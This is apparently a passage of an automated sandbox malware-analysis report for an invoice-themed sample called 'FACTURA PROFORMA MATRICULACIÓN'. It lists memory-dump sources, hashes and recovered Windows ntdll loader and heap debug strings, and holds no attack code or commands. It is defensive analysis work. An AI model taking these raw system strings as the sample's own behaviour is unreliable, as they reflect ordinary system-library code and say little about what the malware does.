                                                  Control-flow Graph (graph not preserved in this extract)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity

                                                  Control-flow Graph (graph not preserved in this extract)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: c8558c82252d60d5646349cf5114ca5d5593492858c033fcfb7a739f9822c14e
                                                  • Instruction ID: a0d1104baa2fe49ae7058ba500dfa1821ff8831116b4b736a2fc0012e14ed3dd
                                                  • Opcode Fuzzy Hash: c8558c82252d60d5646349cf5114ca5d5593492858c033fcfb7a739f9822c14e
                                                  • Instruction Fuzzy Hash: F6A1DB75A14311AFD714CE19C894A5EB7E6FB8C354F054929EA41DB312EBB0EC4ACB81
                                                  Strings
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 367A4460
                                                  • ExecuteOptions, xrefs: 367A44AB
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 367A454D
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 367A4507
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 367A4592
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 367A4530
                                                  • Execute=1, xrefs: 367A451E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 85bae28f17595b185a48f1fda0661db37cc38917adc823f8db89026812d4e9e7
                                                  • Instruction ID: 5cf8301f413146dc6b86615b5ca022e52b08ae99166544607bea68e12d7016bc
                                                  • Opcode Fuzzy Hash: 85bae28f17595b185a48f1fda0661db37cc38917adc823f8db89026812d4e9e7
                                                  • Instruction Fuzzy Hash: 23510C719003196AEF109B96DC8DFFD7769AF04388FD005E9DA05AF182EB319A85CF61
                                                  Strings
                                                  • SsHd, xrefs: 3674A304
                                                  • Actx , xrefs: 36797819, 36797880
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36797807
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 367978F3
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 367977E2
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 367977DD, 36797802
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: 83a6e0eef9facd088058912703c220752d548e665c3f14d6f9ffead206c3a7a2
                                                  • Instruction ID: 805a537a835d728b2d4b905dcd77f97d82bd16fa4c66f3c5c731c1393412a531
                                                  • Opcode Fuzzy Hash: 83a6e0eef9facd088058912703c220752d548e665c3f14d6f9ffead206c3a7a2
                                                  • Instruction Fuzzy Hash: 57E12874A043018FE716DE29C889BAAB7E2BF85354FD04A2DF855CF294DB71D845CB81
                                                  APIs
                                                  Strings
                                                  • Actx , xrefs: 36799315
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36799178
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36799372
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36799153
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3679914E, 36799173
                                                  • GsHd, xrefs: 3674D794
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 6791342bd6d8f279b028994545aa43fe1a9a4c2fe8064cf2635cba6233971499
                                                  • Instruction ID: ee8ba6a8607b02db30b82577c6a283bef9f8b5a9c2447f52f0d5d7a6d7f86136
                                                  • Opcode Fuzzy Hash: 6791342bd6d8f279b028994545aa43fe1a9a4c2fe8064cf2635cba6233971499
                                                  • Instruction Fuzzy Hash: 07E1D574A04341CFF711CF25C888B6AB7E9BF88358F954A2DE9958F281D771E844CB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: 5b8e4e5f9a90d9817ee289adb9538d1ed6a0b90a606bd41fe8d799e2ef492d39
                                                  • Instruction ID: 6b9dce811a617123fd3a6f987df08b6c76a33b18829a35e9dc24a886c6c368d4
                                                  • Opcode Fuzzy Hash: 5b8e4e5f9a90d9817ee289adb9538d1ed6a0b90a606bd41fe8d799e2ef492d39
                                                  • Instruction Fuzzy Hash: DF416EB5E00309ABDB01CF99C894AEEBBB6FF49754F904269ED04AB340D7359902CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: a79a8a45da9fb8f5e0edf6d2a4c52cb39d2f925dd7c464fb58517b5b4bf9bea7
                                                  • Instruction ID: 31caa195fa3fb1e1b6517e9cb04253cfcce0cb3293208a3e94d0b1b9698bbc3f
                                                  • Opcode Fuzzy Hash: a79a8a45da9fb8f5e0edf6d2a4c52cb39d2f925dd7c464fb58517b5b4bf9bea7
                                                  • Instruction Fuzzy Hash: 17711270900644DFDB01CF68C8646ADFBF2FF89714F84845AE584AF291CB399942CF60
                                                  APIs
                                                  Strings
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36789843
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36789885
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36789854, 36789895
                                                  • LdrpLoadShimEngine, xrefs: 3678984A, 3678988B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 735701c221fa536663648769c4a13a03d109d04e1e684e133f2755f1b8e62f8c
                                                  • Instruction ID: dbc707f63f200e1e60f819118c1412f61c422187220bf857ad0f30f77bc77a32
                                                  • Opcode Fuzzy Hash: 735701c221fa536663648769c4a13a03d109d04e1e684e133f2755f1b8e62f8c
                                                  • Instruction Fuzzy Hash: 84516531A103549FDB10DBA8CC98BAC7BB3FB48704F94416AE650BF296DB749C92C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 5283a6e3011c44f3e742a856d9c3ac16307b3928247a00480b57755ba22f9a84
                                                  • Instruction ID: 9be0fde5fb6f870a5b579f2d567dde0b015c61443fed3ae499bcda5958d71623
                                                  • Opcode Fuzzy Hash: 5283a6e3011c44f3e742a856d9c3ac16307b3928247a00480b57755ba22f9a84
                                                  • Instruction Fuzzy Hash: 2E412774A14700DFE701CF24C948BAAB7F6EF40754F9085A9E6055F291CB3C9982CFA5
                                                  APIs
                                                  Strings
                                                  • HEAP: , xrefs: 367DECDD
                                                  • Entry Heap Size , xrefs: 367DEDED
                                                  • ---------------------------------------, xrefs: 367DEDF9
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 367DEDE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: 1698e727641508140f4ce37a9cc6283c6f88bb41c9224bcbe04485f66703a75c
                                                  • Instruction ID: 5e2c97d4d1a46430e18e2760d65a1a1b57248a8ad06315f930b965ed81af5d81
                                                  • Opcode Fuzzy Hash: 1698e727641508140f4ce37a9cc6283c6f88bb41c9224bcbe04485f66703a75c
                                                  • Instruction Fuzzy Hash: 0B41A139A20219DFD706CF15C484A197BB7FF897547A5C9A9D514AF310DB31EC82CBA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 8e71731fc4904c3a261a3a077cc45ecd7f6d328864813786b1c883309c15ce6e
                                                  • Instruction ID: a473301ffbd50780c14c6b8fb244a484233e2d4f2a01ccfd56241d986f6292c0
                                                  • Opcode Fuzzy Hash: 8e71731fc4904c3a261a3a077cc45ecd7f6d328864813786b1c883309c15ce6e
                                                  • Instruction Fuzzy Hash: 84314475520784EFE712DB24C80CB9937EAEB00A58F8084C5E6415F652CB6ED981CA62
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 15b4a591d6950e52b31d8e809c552280239f9dae165e666cad9ea564c44f628e
                                                  • Instruction ID: b8f39af709c839c88b1f663c69631e95185b0b1a309c8ad593cece160f20fbd5
                                                  • Opcode Fuzzy Hash: 15b4a591d6950e52b31d8e809c552280239f9dae165e666cad9ea564c44f628e
                                                  • Instruction Fuzzy Hash: 22818072D112699BDB21CF54CC45BEEB7B8AF08700F5041DAEA19BB250E7309E85CFA5
                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 367A3466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 367A3439
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 367A344A, 367A3476
                                                  • LdrpFindDllActivationContext, xrefs: 367A3440, 367A346C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: c3cf8111d2e2b8e3baf712141668459643b053656a2ac2cf1345d2f419b1883e
                                                  • Instruction ID: a212c324b593959ee4c970a661de74c2339e0bdf0b932190b83399c9cc2d9286
                                                  • Opcode Fuzzy Hash: c3cf8111d2e2b8e3baf712141668459643b053656a2ac2cf1345d2f419b1883e
                                                  • Instruction Fuzzy Hash: 9C3116A6D00311AFFB119B07C844A3572A6BB447ACFC2C366DD026F349E7609C88C6F1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 222d037324587a3c5815230b2d8af021db7e4fac5554b95461c90c5e5bd5bf25
                                                  • Instruction ID: 1fec672181ecf4cceee7be1ba3605ca7863003d375de456ec1429e4105fa06bf
                                                  • Opcode Fuzzy Hash: 222d037324587a3c5815230b2d8af021db7e4fac5554b95461c90c5e5bd5bf25
                                                  • Instruction Fuzzy Hash: 12912371794750AFE305CF25CC48B2AB7A6AF84B44FD04559EA849F281DB38E852CB93
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36799F2E
                                                  • Failed to allocated memory for shimmed module list, xrefs: 36799F1C
                                                  • LdrpCheckModule, xrefs: 36799F24
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: e561d9e4def38362dba2ae6d7029c669ff29a3b6518650c9d8d8a72a8a75f3f9
                                                  • Instruction ID: c2ad7c98698904b56bab0c78c13be1f8ef8ca0050f5c30213ccea8c163727bf8
                                                  • Opcode Fuzzy Hash: e561d9e4def38362dba2ae6d7029c669ff29a3b6518650c9d8d8a72a8a75f3f9
                                                  • Instruction Fuzzy Hash: 3471D575E00205DFEB04DF68CC94BBEB7F2EB48608F9584ADEA05AF251E7349942CB51
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c72e67c23480677e5d1daf697f5ae3e080b1566c93db4cdd1eada9c6afaaba8
                                                  • Instruction ID: 3263402f3f3a3197b50f9e1b651757efc3fb5b1f00c64693408983e21f2321f2
                                                  • Opcode Fuzzy Hash: 8c72e67c23480677e5d1daf697f5ae3e080b1566c93db4cdd1eada9c6afaaba8
                                                  • Instruction Fuzzy Hash: 86E127B4D10718CFEB21CFA9D984A9DBBF2FF48304F61456AE655AB260D734A842CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 29e3af05ffde5790f1fa727c604c4018abab9c9d98d3ae498bf226f67b716fe2
                                                  • Instruction ID: d2c02ff407d2c10cbee3d7d9f925f36ed3d1a29dd12a51d5b75377d7092c665c
                                                  • Opcode Fuzzy Hash: 29e3af05ffde5790f1fa727c604c4018abab9c9d98d3ae498bf226f67b716fe2
                                                  • Instruction Fuzzy Hash: 54517D75B14626EFEB08CE19CC91A9D73E1BB8D354B10486DDA06D7712DBB1AC45CF80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b240f1971ffbe5efdaf16d7a2c891b289b6ae8a6a2b792a59eb032e1aad69745
                                                  • Instruction ID: ef58192c2f8e2ed1c8963df4a94631405a33fee3dd0183c0b87d6111e1454680
                                                  • Opcode Fuzzy Hash: b240f1971ffbe5efdaf16d7a2c891b289b6ae8a6a2b792a59eb032e1aad69745
                                                  • Instruction Fuzzy Hash: 215125B2E103189FEF04CF9AD844ADDBBB6BF48354F94822AE905AB350D7359941CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: 1f6f09382f1ab42b2c7e0f6c94eeb84665d78d03a269fd1b8bbcc9519a02df17
                                                  • Instruction ID: f75e0032ea085adc6f2ba0dbef5cf1106eb1a940a931534d3f1c1c9e39742d7e
                                                  • Opcode Fuzzy Hash: 1f6f09382f1ab42b2c7e0f6c94eeb84665d78d03a269fd1b8bbcc9519a02df17
                                                  • Instruction Fuzzy Hash: 42312875E00218DFDF05DFA9D848A9DBBF1AB4C720F50812AEA11BB390D7355901CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: b20828674d286b3fea30a7c790fd27657ac282c5fb145361589e0abcbfff9a34
                                                  • Instruction ID: e193a806d9d4865256387f5532ce046f06792b4896fc5e381ce9757448c823b1
                                                  • Opcode Fuzzy Hash: b20828674d286b3fea30a7c790fd27657ac282c5fb145361589e0abcbfff9a34
                                                  • Instruction Fuzzy Hash: E2324B74D11369DFEB22CF64C848BE9BBB1BF08344FA081E9D549AB242D7745A84CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: ${}6
                                                  • API String ID: 0-6358032
                                                  • Opcode ID: 86968a2e47189f5913f97a688a77bf2d1da061104e635ac07abd3d31cf81a978
                                                  • Instruction ID: 9dc3cb4ec9343e97b925650a07391e2c79257dfc6c82f446b40007a3ae263efa
                                                  • Opcode Fuzzy Hash: 86968a2e47189f5913f97a688a77bf2d1da061104e635ac07abd3d31cf81a978
                                                  • Instruction Fuzzy Hash: FDB14D71A093019FD710CF29C884A6BB7E5EF84754F944E6EF9A49B2A0D730D944CF92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: bc1b82a65e79c15f965dc8c1687b280c06535592495347d991e1b3a7167aa683
                                                  • Instruction ID: 7b2e111eff0a2bab70506919aac530f003a7043d96de5c13b61a4f72ea1a1896
                                                  • Opcode Fuzzy Hash: bc1b82a65e79c15f965dc8c1687b280c06535592495347d991e1b3a7167aa683
                                                  • Instruction Fuzzy Hash: B2519CB5E10704CBEB10CF96C884769FBF6EF44758FA4C22AD84A9F244E7709985CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ^r6
                                                  • API String ID: 3446177414-2011571528
